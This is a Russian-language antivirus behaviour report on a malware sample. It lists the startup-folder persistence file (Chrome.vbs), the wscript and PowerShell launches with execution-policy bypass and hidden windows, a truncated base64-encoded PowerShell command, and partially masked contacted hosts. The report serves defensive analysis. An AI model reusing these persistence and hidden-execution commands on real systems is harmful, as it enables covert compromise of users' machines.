Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\chrome.vbs
Вредоносные функции
Создает и запускает на исполнение (эксплоит)
- '<SYSTEM32>\wscript.exe' "%APPDATA%\Upload.vbs"
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\Upload.vbs"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -exec bypass -window 1 Copy-Item '%APPDATA%\Upload.vbs' '%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Chrome.vbs';
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\upload.vbs
Сетевая активность
Подключается к
- 'dc###.4sync.com':443
- 'cr#.#odaddy.com':80
- 'b2#.#dns.com.br':5552
TCP
Запросы HTTP GET
- http://cr#.#odaddy.com/gdroot-g2.crl
- http://cr#.#odaddy.com/gdig2s1-1922.crl
UDP
- DNS ASK dc###.4sync.com
- DNS ASK cr#.#odaddy.com
- DNS ASK b2#.#dns.com.br
Другое
Создает и запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -exec bypass -window 1 Copy-Item '%APPDATA%\Upload.vbs' '%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Chrome.vbs';' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABDAGgAcgBvAG0AZQBcACkALgBDAGgAcgBvAG0AZQApA...' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -exec bypass -window 1 -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABDAGgAcgBvAG0AZQBcACkALgBDAGgAcgBvAG0AZQApA...
